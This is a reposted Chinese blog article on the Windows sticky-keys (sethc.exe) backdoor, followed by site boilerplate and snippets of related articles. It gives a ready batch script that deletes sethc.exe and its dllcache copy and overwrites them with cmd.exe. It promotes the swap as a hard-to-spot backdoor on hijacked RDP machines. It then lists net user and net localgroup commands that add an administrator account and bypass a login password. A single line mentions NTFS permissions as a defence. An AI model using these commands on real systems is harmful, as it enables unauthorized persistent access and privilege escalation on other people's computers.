粘滞键漏洞,按5下shift后,windows就执行了system32下的sethc.exe

最新推荐文章于 2024-05-27 17:25:20 发布
最新推荐文章于 2024-05-27 17:25:20 发布
阅读量428 收藏
点赞数
文章标签: 操作系统
原文链接:http://www.cnblogs.com/cqsar/articles/1225764.html
版权

粘滞键漏洞,按5下shift后,windows就执行了system32下的sethc.exe

Windows的粘滞键。是按5下shift后,windows就执行了system32下的sethc.exe。即使
在3389中,都可以弹出!!
它本来是为不方便按组合键的人设计的。 如果我们把那个sethc.exe替换成我们想要的其它文件,比如说cmd.exe,那么就可以用cmd命令了.
其实写的批处理就可以解决了 又不麻烦

@echo off
del /q %systemroot%\system32\dllcache\sethc.exe
del /q %systemroot%\system32\sethc.exe
copy %systemroot%\system32\cmd.exe %systemroot%\system32\sethc.exe
copy %systemroot%\system32\cmd.exe %systemroot%\system32\dllcache\sethc.exe
我把它保存为5shift.bat。当我们运行它的时候,sethc.exe 就被换成了改了名的cmd.exe了。
可能由于cmd也是系统文件,所以替换是并没有弹出文件保护。呵呵。

个人感觉这个后门非常实用(特别是3389肉鸡!)。哪个管理员会考虑到这种后门呢

然后你就可以创建用户了
net user [UserName [Password | *] [options] [/domain]
net user [UserName {Password | *} /add [options] [/domain]
net user [UserName [/delete] [/domain]

[color=Red][b]把sethc.exe文件的NTFS权限设置一下就安全了.[/b][/color]

用shift键破解windows的登录密码.

首先用DOS盘启动.然后转到c:\windows\system32\下面.输入如下命令:

copy sethc.exe sethc2.exe 备份粘滞键文件

copy cmd.exe sethc.exe 用cmd.exe覆盖sethc.exe

然后重启.当需要输入密码的时候按5下shift就打开cmd窗口,然后输入如下密码:

net user admin admin /add 添加admin用户,密码是admin

net localgroup administrators admin /add 提升为超级管理员

转载于:https://www.cnblogs.com/cqsar/articles/1225764.html

weixin_30781433
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
粘滞漏洞破解系统管理员权限的方法
09-04
利用粘滞漏洞来破解管理员权限,在机器上实验过
关于windows粘滞后门漏洞
qq_52134654的博客
06-30 2509
漏洞仅适用于Windows7及以下的windows操作系统粘滞是一种快捷,是为同时按下两个或多个有困难的人而设计的,要功能是方便Shift、Ctrl、Alt与其他的组合使用。启动粘滞可通过单击“开始→设置→控制面板→辅助功能选项”,在“盘”选项卡下选中“使用粘滞”来启动。或者连续按shift五次。开启粘滞的时候,任务栏右边的系统托盘区出现粘滞图标。...
WINDOWS漏洞:粘置
热门推荐
小章的专栏
03-14 1万+
windows 2000/xp/vista下,按shift5次,可以打开粘置,运行sethc.exe,而且,在登录界面里也可以打开。这就让人联想到WINDOWS的屏保,将程序替换成cmd.exe后,就可以打开shell了。参考McafeeAvertLabs:http://www.avertlabs.com/research/blog/?p=218XP:将安装源光盘弹出(或将硬盘上的安装目录改
怎么样把cmd程序替换sethc程序
08-08
很有用的,我觉得.将系统中的辅助工具“sethc.exe”。替换成为“explerer.exe”,这样就可以在3389或本地登录界面中打开粘滞开关了。
利用win7shift粘滞漏洞破解系统密码
星|Donstpast
03-27 2867
你需要知道的一些东西: 1.粘滞位置:c:\windows\system32\stthc.exe 2.cmd路径:c:\windows\system32\cmd 3.用户密码储存位置:c:\windows\system32\config\SAM 4.修改用户密码的命令:net user 用户名 密码 本次实验环境 实验原理 这是一次关于提权的尝试。shift粘滞漏洞windows系统一个经典...
后渗透篇:组策略禁止sethc.exe运行,防止3389的sethc后门【利用与防范详细演示】
bylfsj的博客
10-10 4452
当你的才华 还撑不起你的野心时 那你就应该静下心来学习 目录 组策略禁止sethc.exe运行,防止3389的sethc后门 0x01 前言 0x02 防御方法 0x03 操作演示 0x04 检测和清理方法 0x05 新方法设置粘滞后门 0x06 问题记录 0x07 总结   组策略禁止sethc...
粘滞替换为cmd.exe
07-02
可以将粘滞的效果替换为打开cmd.exe 在XP下直接可用,在win7下需要先获取sethc.exe的Trustedinstaller权限。
360屏蔽windows和系统粘滞.docx
09-26
360屏蔽windows和系统粘滞.docx
粘滞屏蔽助手 v2.1.zip
07-14
按下3次Shift老是弹出粘滞怎么办?赶紧用粘滞屏蔽助手,精灵小巧,迷你小界面,安全可靠,一操作,只需一步,绝不繁琐,一帮你解除烦恼。 粘滞屏蔽助手 v2.1更新日志: 紧急修复了重启服务的一...
Linux下的粘滞位详细介绍
09-15
主要介绍了Linux下的粘滞位详细介绍的相关资料,需要的朋友可以参考下
windows操作系统实验之粘滞漏洞
m0_55525922的博客
04-13 407
Windows系统登录界面状态下,粘滞仍可以以连续按5下SHIFT运行,并且此时应用程序WINDOWS的最高权限-SYSTEM权限运行,所以计算机一旦被安装该后门,入侵者便可悄无声息地远程操纵计算。找到名字为sethc的文件(随便点击一个文件,按s就可以快速查找s开头的文件),也就是粘滞,把文件名改成任意名。选择计算机——d盘(也就是平时系统的c盘)————windows目录——System32目录,是计算机最高的权限,那么就可以输入命令修改账户的密码,或者新建一个用户,赋予它管理员的权限。
漏洞复现 | win7粘滞漏洞复现
made_cola的博客
03-20 1074
粘滞是一种快捷,是为同时按下两个或多个有困难的人而设计的,要功能是方便Shift、Ctrl、Alt与其他的组合使用。启动粘滞可通过单击“开始→设置→控制面板→辅助功能选项”,在“盘”选项卡下选中“使用粘滞”来启动。或者连续按shift五次。开启粘滞的时候,任务栏右边的系统托盘区出现粘滞图标。而攻击者正是利用了其按五次shift出现弹窗的特性对系统进行攻击。
Win7 粘滞漏洞利用绕过登录密码
老司机开代码的博客
09-26 4240
文章目录1. 原理2. 利用 1. 原理 在win7登录界面,连按5次Shift,则弹出粘滞提示。而此程序的路径位于c:\windows\system32路径下。可以将此程序的路径掉包成cmd,实现在登录界面弹出cmd命令行,重置登录密码实现登录。 2. 利用 首先开启win7,在启动的过程中直接断电强制关机。然后再次启动,win7出现一个修复的界面。我们选择修复排查问题那一选项。 然后windows建议我们还原系统,这里选择取消。 取消后,等待比较长的一段时间。 这里选择查看问题详细信息
Windows 2000漏洞集锦
morningbird的专栏
07-24 2652
Windows 2000漏洞集锦2001-07-18 00:01:10· ·苗得雨··yesky1 2 3 4 5  下一页  对于Windows 2000的强大的功能和全新的构架我们都不得不叹服微软的实力,可以预见Windows 2000将成为新一代服务器操作系统的主流,同时也成为黑客攻击的对象。但是由于新的Windows2000的全新构架很大程度都依赖于Active Direc
操作系统 - 输入/输出(I/O)管理
最新发布
qq_56815564的博客
05-27 652
1、设备的分类I/O设备是指**可以将数据输入计算机的外部设备,或者可以接收计算机输出数据的外部设备**按信息交换的单位分类块设备。信息交换以**数据块为单位,如磁盘、磁带等磁盘设备的基本特征是传输速率较高、可寻址,即对它可随机地读/写任意一块**字符设备。信息交换以**字符为单位,如交互式终端机、打印机等它们的基本特征是传输速率低、不可寻址,并且时常采用中断I/O方式**按设备的传输速率分类低速设备。传输速率仅为每秒几字节到数百字节,如盘、鼠标等中速设备。
(Linux)显存被占用-显示没有进程-nohup
qq_39214409的博客
05-25 543
这种情况多半是代码中 num_works 的设置大于1导致的。nvidia-smi显示的PID是父进程,那么在kill掉此进程后,子进程仍然在工作。关问题在于如何找到子进程并终止。
【Linux】中的常见的重要指令(中)
2401_84568462的博客
05-25 921
递归处理,将指定目录下的文件与子目录一并处理。若源文件或目录的形态,不属于目录或符号链接,则一律视为普通文件处理。则它把前面指定的所有文件或目录复制到此目录中。指令用于复制文件或目录,如同时指定两个以上的文件或目录,且最后的目的地是一个已经存在的目录,命令完成文件重命名,此时,源文件只能有一个(也可以是源目录名),它。当第二个参数是已存在的目录名称时,源文件或目录参数可以有多个,强行复制文件或目录, 不论目的文件或目录是否已经存在。强制的意思,如果目标文件已经存在,不询问而直接覆盖。
Linux文件操作——实现cp指令以及模拟修改配置文件
shion1114的博客
05-23 340
cp 1.c 2.c功能是将(内容相同,实现拷贝)main函数的参数由编译结果可知,总共有三个输入参数,同时输出每个参数字符串内容。
windows 粘滞
08-03
Windows粘滞是一种功能,它可以使得按在按下后保持按住的状态,而不需要一直按住盘。然而,有时候粘滞可能导致一些不便,比如在按下Shift、Ctrl、Alt等发出滴滴声,影响打字。为了解决这个问题,...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值